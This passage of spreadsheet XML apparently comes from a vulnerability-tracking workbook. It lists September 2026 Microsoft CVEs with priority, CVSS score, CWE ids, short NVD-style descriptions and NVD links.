          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69334</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69355</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69360</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69386</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69434</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69442</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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46" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69485</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69494</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69495</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69499</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69511</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
